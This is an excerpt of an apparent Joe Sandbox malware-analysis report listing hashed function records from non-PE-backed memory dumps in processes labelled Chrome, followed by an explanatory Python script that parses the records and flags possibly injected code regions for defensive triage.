                                                                                                                    • Instruction Fuzzy Hash: 4F412A31B1CA4A4FE755BB3C98562B977D2EF85321B4801BAD44DC7293ED58BC828741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2122180243.00007FF7C1440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1440000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ff7c1440000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e61881812c303d7e2cb51e66ab59d7cdc0a84575a681aca00d3b92645b8dce89
                                                                                                                    • Instruction ID: 67da4e92fc5e17d962dcae04a2fc1f73872990cc529c1ee75d3a81c0568c484c
                                                                                                                    • Opcode Fuzzy Hash: e61881812c303d7e2cb51e66ab59d7cdc0a84575a681aca00d3b92645b8dce89
                                                                                                                    • Instruction Fuzzy Hash: 8731EB60B1C9494FE798EB2C585A779B7D2FF98361F4405BEE00EC3293DD54AC458341
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2122180243.00007FF7C1440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1440000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ff7c1440000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 105cb8a67f38d354f4aed6091bc9a38f6476775e20226f73383828ee870cd661
                                                                                                                    • Instruction ID: c863f3f20b9bd1b3c13ce4c60b35dd7f937376fca388959b6753f08972653b54
                                                                                                                    • Opcode Fuzzy Hash: 105cb8a67f38d354f4aed6091bc9a38f6476775e20226f73383828ee870cd661
                                                                                                                    • Instruction Fuzzy Hash: 8E31B271F18A094FE784BBBC58193BDB7D1EF99762F4442BAE00DC3282DD68A9018791
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2122180243.00007FF7C1440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1440000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ff7c1440000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6777895f985c0530c4f45dec050264d2dc425523dbdeaabd0ba6a798ddb157c1
                                                                                                                    • Instruction ID: d5b385e3fb696e9972598f3da7529e70d0d1aac66b80544ce13f9ac383a1c035
                                                                                                                    • Opcode Fuzzy Hash: 6777895f985c0530c4f45dec050264d2dc425523dbdeaabd0ba6a798ddb157c1
                                                                                                                    • Instruction Fuzzy Hash: 77012B5190D7C10FE7567B386C65835BFE09F91260B4805BEE885C71EBD848AA448352
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2189681927.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a61919690200872721c7517ec0116fc7a29e299aa55c55d18201a38551bff183
                                                                                                                    • Instruction ID: 602bc0fc04268b5fbdaf176697a79344d97d16e1488b60f9cfc9a8c8295709a4
                                                                                                                    • Opcode Fuzzy Hash: a61919690200872721c7517ec0116fc7a29e299aa55c55d18201a38551bff183
                                                                                                                    • Instruction Fuzzy Hash: A832A130B28A098FE794FB2898597B9F7D2FF99751F8445B9D00EC33C2DE68A8418741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2189681927.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 990e53746cdbf500f24884498e1d483c3089f430f933272b219b1bc11037fd59
                                                                                                                    • Instruction ID: b80aa672a1fb69d011ace22a30e3aa3ddc450c70af1c90ccc6e112e2640a1130
                                                                                                                    • Opcode Fuzzy Hash: 990e53746cdbf500f24884498e1d483c3089f430f933272b219b1bc11037fd59
                                                                                                                    • Instruction Fuzzy Hash: 04512460A1DAC94FD796AB385864676BFE1EF47225B0801FBE0CDC7193DD4C584AC352
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2189681927.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 82f7817d577e7a97bd46454436ffcfca1011c2a6bccbc1ed000bfb5351eb0cbe
                                                                                                                    • Instruction ID: 3e794f6c6e4f7c353a0565dae91ef1618949ea4c5dfa9a0ee34456b5b7f1a397
                                                                                                                    • Opcode Fuzzy Hash: 82f7817d577e7a97bd46454436ffcfca1011c2a6bccbc1ed000bfb5351eb0cbe
                                                                                                                    • Instruction Fuzzy Hash: 0721D77090864A8FD709AB38C8652EAFFB2FF49345F4541BAC00AD72D3CE3478158790
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2189681927.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 099baab17b6a506a9027fdf0575e2e3ca8ba3cd356f15f7d01fc2701db5ab9fc
                                                                                                                    • Instruction ID: 8b63f008862b3e11e2ce8b18e32e2b28f1cc6c290bcfe456b1ceb5c0d3a05d8a
                                                                                                                    • Opcode Fuzzy Hash: 099baab17b6a506a9027fdf0575e2e3ca8ba3cd356f15f7d01fc2701db5ab9fc
                                                                                                                    • Instruction Fuzzy Hash: 2441F775F08A1A9FDB44FB68D8556EDB7E1FF88362F90457AD009C7382CE34A8468790
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2189681927.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 988127d8de3db9930fe7d255bbaadd45ed93d8db205e2ea7ff2151a1d40529d2
                                                                                                                    • Instruction ID: aab8f4954c15f074aad6721df1fcd15275191bfc35639af2b1281b3c618d05f6
                                                                                                                    • Opcode Fuzzy Hash: 988127d8de3db9930fe7d255bbaadd45ed93d8db205e2ea7ff2151a1d40529d2
                                                                                                                    • Instruction Fuzzy Hash: F0412631B1CA4A0FE755BB3CA8562B977D2EF89331B4901BAD44DC7293DD58BC828741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2189681927.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6172d8a9849feb86a986d69806e78d3b56130c217f8d14a68ae9d9d7e6a0f9e0
                                                                                                                    • Instruction ID: 9d1a99c7b5aaffadff97e688d769760718c8e50c2ef5db0150e5045994f424a2
                                                                                                                    • Opcode Fuzzy Hash: 6172d8a9849feb86a986d69806e78d3b56130c217f8d14a68ae9d9d7e6a0f9e0
                                                                                                                    • Instruction Fuzzy Hash: 0B31C661B1C9494FE798EB2C9859779B7D2EF9C361F4406BEE00EC3293DD68AC468341
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2189681927.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d35e16e9120169c5246c3e8ec89796ad4a73a2155dfbfe1474d8d540699a6a04
                                                                                                                    • Instruction ID: a6286c4f606e7bfa57f3d8358882a98a9f72955f4c4268bef0f0939fc515f657
                                                                                                                    • Opcode Fuzzy Hash: d35e16e9120169c5246c3e8ec89796ad4a73a2155dfbfe1474d8d540699a6a04
                                                                                                                    • Instruction Fuzzy Hash: 4231E671F189094FE744BBBD98193BDB7D1EF99762F4402BAE00EC3283DD28A8418791
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2189681927.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 447e14b5853b45411076cf52adfa4f577d581ecb926ca172f94032131bae4f4e
                                                                                                                    • Instruction ID: 8279111bc04bc3287c3f27df40e7e9344210a550b011c2827fa2a74b623d0727
                                                                                                                    • Opcode Fuzzy Hash: 447e14b5853b45411076cf52adfa4f577d581ecb926ca172f94032131bae4f4e
                                                                                                                    • Instruction Fuzzy Hash: 28012B5190D6C10FE355BB385C65535BFE08FA2320B4C05FEE885C71E7DC489A848362
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2269770765.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 216d90848ceb36bb09c6708973415515466df9bfbfdf8dda2a03866afd599ac1
                                                                                                                    • Instruction ID: 154d53f023bb1f811ccfb0d3101ea199a80aab149f39c7abe0e2cd3d769999d3
                                                                                                                    • Opcode Fuzzy Hash: 216d90848ceb36bb09c6708973415515466df9bfbfdf8dda2a03866afd599ac1
                                                                                                                    • Instruction Fuzzy Hash: 48329330B28A498FE794FB3888597B9B7D2FF89755F8445B9D00EC33C2DE68A9418741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2269770765.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ff7c1420000_Chrome.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1d4bf41de7fbb9067c9aea6df20390b646cefac15cd07158ea00f46c6fa6a9d0
                                                                                                                    • Instruction ID: ec74bc62d6a5aaa2beab6ec0e0e80d560349e335d2d92b565ba110aaa2f19714
                                                                                                                    • Opcode Fuzzy Hash: 1d4bf41de7fbb9067c9aea6df20390b646cefac15cd07158ea00f46c6fa6a9d0
• Instruction Fuzzy Hash: 2F512460A1DAC94FD796AB384864676BFE1EF47225B0801FBE0CDC7193DD4C584AC352
Memory Dump Source
• Source File: 0000001F.00000002.2269770765.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_7ff7c1420000_Chrome.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 876c6b594e746715a67f9535d4ad7f157c7bce0df2331f8dea8494fbfc00bf72
• Instruction ID: 0f1525a0917f5be6027a09a7d17e2ae9f80fdab489b72cb5b366f9e0cb07b8c6
• Opcode Fuzzy Hash: 876c6b594e746715a67f9535d4ad7f157c7bce0df2331f8dea8494fbfc00bf72
• Instruction Fuzzy Hash: 1D21C57090868A8FD709EB39C8652EAFBB2FF49245F4541FAC00AD72D3CE7468158790
Memory Dump Source
• Source File: 0000001F.00000002.2269770765.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_7ff7c1420000_Chrome.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9de6e77f31ee3a0acd7aa175f5345e78bee0065513a76bdc69eb67479c4dbb13
• Instruction ID: d6718f20c461043525eefa332605463d53cd8a1da5842fa6a0ad2f36d2626d6d
• Opcode Fuzzy Hash: 9de6e77f31ee3a0acd7aa175f5345e78bee0065513a76bdc69eb67479c4dbb13
• Instruction Fuzzy Hash: 2841E635B18A1D9FDB44FB68D8556EDB7E1FF88352F5041BAD009C7382CE34A8468790
Memory Dump Source
• Source File: 0000001F.00000002.2269770765.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_7ff7c1420000_Chrome.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4ec1b8245b22f506890b48778d2e21204676b949a31db1c72f7d39340f1b2600
• Instruction ID: 9000aa2f234ff6d677379d83e9bd37fca3b675ef259be7eaa96c7cbeff521427
• Opcode Fuzzy Hash: 4ec1b8245b22f506890b48778d2e21204676b949a31db1c72f7d39340f1b2600
• Instruction Fuzzy Hash: FF410431B1CA4A0FE755BB38A8562B977D2EF89321B4941FAD44DC7293DD58BC828341
Memory Dump Source
• Source File: 0000001F.00000002.2269770765.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_7ff7c1420000_Chrome.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 63ab73d8e8326640cad96b1f98b884982936d3479f0ec89b94f1e3406baa1e25
• Instruction ID: 8b4f1bdfd4c1d4167170619c35cc6790533510ccf5a7f455c7c21dae6f102eb5
• Opcode Fuzzy Hash: 63ab73d8e8326640cad96b1f98b884982936d3479f0ec89b94f1e3406baa1e25
• Instruction Fuzzy Hash: 3931B561B1C9494FE798EB2C9859779B7D2EF98361F4406BEE00EC3293DD68AC468341
Memory Dump Source
• Source File: 0000001F.00000002.2269770765.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_7ff7c1420000_Chrome.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d35e16e9120169c5246c3e8ec89796ad4a73a2155dfbfe1474d8d540699a6a04
• Instruction ID: a6286c4f606e7bfa57f3d8358882a98a9f72955f4c4268bef0f0939fc515f657
• Opcode Fuzzy Hash: d35e16e9120169c5246c3e8ec89796ad4a73a2155dfbfe1474d8d540699a6a04
• Instruction Fuzzy Hash: 4231E671F189094FE744BBBD98193BDB7D1EF99762F4402BAE00EC3283DD28A8418791
Memory Dump Source
• Source File: 0000001F.00000002.2269770765.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_7ff7c1420000_Chrome.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1a0f60361c9499600ab1e2a1c00d644d14d0a7581e93d8a6285e55e8d52b7bb4
• Instruction ID: 1a1810bf6943ee949c683729d0214ad915ed3843944071389fd9f058469d561b
• Opcode Fuzzy Hash: 1a0f60361c9499600ab1e2a1c00d644d14d0a7581e93d8a6285e55e8d52b7bb4
• Instruction Fuzzy Hash: 1301261590DAC54FE356BB384C65935BFE08FA2320B4805FAE889C71E7DC49AA848362
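The entries above are Joe Sandbox function records: each names the memory dump (.sdmp) the function was disassembled from, the IDA snapshot (.jbxd), an Opcode ID and Instruction ID, and a pair of fuzzy hashes. Every dump listed here is marked "based on PE: false", i.e. the code did not come from a mapped image. The following Python is an added example, not part of this report or of Joe Sandbox's own tooling: it parses records in this layout, decodes the dump name and groups the functions per dump, so a triager can see how many functions were recovered from each non-PE-backed region. The PID (0x1F = 31), phase (2) and base address in the .sdmp name are corroborated by the snapshot name hcaresult_31_2_7ff7c1420000_Chrome.jbxd; reading the fifth dotted field as the Win32 page protection (0x40 = PAGE_EXECUTE_READWRITE) and the snapshot name as hcaresult_<pid>_<phase>_<base>_<process>.jbxd are assumptions made here, not facts stated by the report. The sample input is constructed from two of the entries on this page.

```python
"""Parse Joe Sandbox 'Memory Dump Source' function records and summarize them per dump.
Added example, not part of the report or of Joe Sandbox tooling. Assumed (not stated by the
page): 5th dotted .sdmp field = Win32 page protection; .jbxd = hcaresult_<pid>_<phase>_<base>_<process>."""
import re
from collections import OrderedDict

PAGE_EXECUTE_READWRITE = 0x40  # Win32 memory-protection constant

# Constructed sample input: two function records copied from the report entries above.
SAMPLE_REPORT = """\
Memory Dump Source
• Source File: 0000001F.00000002.2269770765.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_7ff7c1420000_Chrome.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 876c6b594e746715a67f9535d4ad7f157c7bce0df2331f8dea8494fbfc00bf72
• Instruction ID: 0f1525a0917f5be6027a09a7d17e2ae9f80fdab489b72cb5b366f9e0cb07b8c6
• Opcode Fuzzy Hash: 876c6b594e746715a67f9535d4ad7f157c7bce0df2331f8dea8494fbfc00bf72
• Instruction Fuzzy Hash: 1D21C57090868A8FD709EB39C8652EAFBB2FF49245F4541FAC00AD72D3CE7468158790
Memory Dump Source
• Source File: 0000001F.00000002.2269770765.00007FF7C1420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_7ff7c1420000_Chrome.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9de6e77f31ee3a0acd7aa175f5345e78bee0065513a76bdc69eb67479c4dbb13
• Instruction ID: d6718f20c461043525eefa332605463d53cd8a1da5842fa6a0ad2f36d2626d6d
• Opcode Fuzzy Hash: 9de6e77f31ee3a0acd7aa175f5345e78bee0065513a76bdc69eb67479c4dbb13
• Instruction Fuzzy Hash: 2841E635B18A1D9FDB44FB68D8556EDB7E1FF88352F5041BAD009C7382CE34A8468790
"""

BULLET_RE = re.compile(r"^[•*-]?\s*([^:]+?):\s*(.*)$")
SOURCE_RE = re.compile(r"^(?P<dump>[0-9A-Fa-f.]+\.sdmp), Offset: (?P<offset>[0-9A-Fa-f]+), "
                       r"based on PE: (?P<pe>true|false)$")
SNAPSHOT_RE = re.compile(r"^hcaresult_(?P<pid>\d+)_(?P<phase>\d+)_(?P<base>[0-9a-fA-F]+)_(?P<proc>.+)\.jbxd$")


def parse_entries(text):
    """One dict of 'field: value' pairs per 'Memory Dump Source' record; header lines without a colon are skipped."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            entries.append(current)
        elif current is not None and (m := BULLET_RE.match(line)):
            current[m.group(1).strip()] = m.group(2).strip()
    return entries


def parse_dump_name(dump):
    """Decode the dotted .sdmp name; PID and base address are hex (0x1F -> 31)."""
    fields = dump[: -len(".sdmp")].split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected dump name layout: {dump}")
    protect = int(fields[4], 16)  # assumption: this field is the page protection
    return {"pid": int(fields[0], 16), "phase": int(fields[1], 16), "dump_id": fields[2],
            "base": int(fields[3], 16), "protect_field": protect,
            "rwx_assumed": protect == PAGE_EXECUTE_READWRITE}


def parse_snapshot_name(snapshot):
    """Decode hcaresult_<pid>_<phase>_<base>_<process>.jbxd (assumed layout); None if it does not fit."""
    m = SNAPSHOT_RE.match(snapshot or "")
    return None if not m else {"pid": int(m["pid"]), "phase": int(m["phase"]),
                               "base": int(m["base"], 16), "process": m["proc"]}


def summarize(entries):
    """Group records by dump; flag regions that are not PE-backed and (by assumption) RWX."""
    by_dump = OrderedDict()
    for e in entries:
        src = SOURCE_RE.match(e.get("Source File", ""))
        if not src:
            continue
        if src["dump"] not in by_dump:
            dump, snap = parse_dump_name(src["dump"]), parse_snapshot_name(e.get("Snapshot File"))
            by_dump[src["dump"]] = {
                **dump, "pe_backed": src["pe"] == "true", "functions": 0,
                "process": snap["process"] if snap else None,
                # the .jbxd and .sdmp names should agree on PID, phase and base address
                "snapshot_consistent": bool(snap) and all(snap[k] == dump[k] for k in ("pid", "phase", "base")),
                "opcode_id_equals_fuzzy_hash": True}
        info = by_dump[src["dump"]]
        info["functions"] += 1
        if e.get("Opcode ID") != e.get("Opcode Fuzzy Hash"):
            info["opcode_id_equals_fuzzy_hash"] = False
    for info in by_dump.values():
        info["suspect_injected"] = not info["pe_backed"] and info["rwx_assumed"]
    return by_dump


if __name__ == "__main__":
    for name, info in summarize(parse_entries(SAMPLE_REPORT)).items():
        print(name, {k: v for k, v in info.items() if k != "dump_id"})
```

Run stand-alone it prints one summary per dump. Two details are worth knowing when reading the records: in every entry on this page the Opcode ID is identical to the Opcode Fuzzy Hash while the Instruction ID and Instruction Fuzzy Hash differ, so the summary records that observation per dump instead of assuming it holds for other reports; and a dump that is not PE-backed, sits in a process whose snapshot is labelled Chrome, and (if the protection reading is right) is writable and executable is the region to look at first when hunting for injected or unpacked code, which is why `suspect_injected` combines those two flags rather than either alone.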